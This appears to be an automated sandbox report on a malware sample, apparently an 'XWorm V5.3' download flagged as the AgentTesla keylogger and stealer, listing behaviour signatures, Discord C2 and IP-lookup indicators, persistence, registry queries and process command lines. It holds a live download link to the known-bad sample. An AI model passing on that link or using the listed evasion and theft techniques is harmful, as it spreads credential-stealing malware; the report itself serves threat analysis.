Malware Analysis Report

2024-11-30 19:03

Sample ID 240314-3dw8facc64
Target https://mega.nz/file/YTEWzJyZ#4v2TpPOSw6f4tsdkunoEISAtQWQIAyWneo7iZcB_rXY
Tags
agenttesla agilenet keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://mega.nz/file/YTEWzJyZ#4v2TpPOSw6f4tsdkunoEISAtQWQIAyWneo7iZcB_rXY was found to be: Known bad.

Malicious Activity Summary

agenttesla agilenet keylogger spyware stealer trojan

AgentTesla

AgentTesla payload

Loads dropped DLL

Obfuscated with Agile.Net obfuscator

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-14 23:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-14 23:24

Reported

2024-03-14 23:29

Platform

win10v2004-20240226-en

Max time kernel

178s

Max time network

267s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/YTEWzJyZ#4v2TpPOSw6f4tsdkunoEISAtQWQIAyWneo7iZcB_rXY

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\XWorm V5.3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\XWorm V5.3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\XWorm V5.3.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\xworm5.3loaderx64cleandbyezerodwaboutthelogiwasbored.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\XWorm V5.3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\xworm5.3loaderx64cleandbyezerodwaboutthelogiwasbored.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 804 wrote to memory of 4016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4016 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 1408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 1408 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 804 wrote to memory of 4744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/YTEWzJyZ#4v2TpPOSw6f4tsdkunoEISAtQWQIAyWneo7iZcB_rXY

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc319646f8,0x7ffc31964708,0x7ffc31964718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5696 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4b0 0x154

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2140 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1

